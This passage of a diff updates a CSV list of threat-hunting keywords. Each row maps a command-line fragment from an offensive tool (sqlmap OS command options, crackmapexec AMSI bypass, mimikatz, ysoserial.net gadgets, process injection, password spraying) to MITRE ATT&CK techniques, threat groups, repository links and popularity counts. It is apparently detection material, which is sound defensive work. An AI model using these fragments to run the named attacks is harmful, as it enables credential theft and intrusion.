octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" -"* -old-bloodhound*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* -old-bloodhound*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "* omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --oneliner-nothidden*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* --oneliner-nothidden*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* onesixtyone.c*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" -"* --only-abuse --dc-host *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --only-known-exploit-paths*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"* --only-abuse --dc-host *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --only-known-exploit-paths*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "* openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1425,62 +1425,62 @@ "* oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-sid-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --os-bof*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --os-cmd whoami*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --os-pwn*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --os-smbrelay*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-bof*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-cmd whoami*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-pwn*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-smbrelay*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* --outdir ldapdomaindump *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --output rootDSEs.json --dump*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* --output rootDSEs.json --dump*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" "* ovs-agent-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* owa * --user-as-pass *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* oxidfind -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* oxidfind -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" -"* -p * --amsi-bypass *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -p * -d *.dll -e OpenProcess*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"* -p * --amsi-bypass *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -p * -d *.dll -e OpenProcess*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "* -p *\mimi.out*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -p 1337:1337 -p 5000:5000*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "* -p 4644 -n mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","blank lmhash","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" -"* -p ActivatorUrl*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -p Altserialization*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p ActivatorUrl*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p Altserialization*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -p CommonsCollections1 -c whoami*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* -p DotNetNuke*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p DotNetNuke*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -p LastLogonTimestamp -p LastLogonUserName *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* -p powershell -i *.ps1 -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"* -p SessionSecurityTokenHandler*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p SessionSecurityTokenHandler*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -p shellcode -i *.bin -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"* -p test_passwords.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -p TransactionManagerReenlist*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*' p::d '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* -p test_passwords.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -p TransactionManagerReenlist*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*' p::d '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "* -p:AssemblyName=inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --pacu-help*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 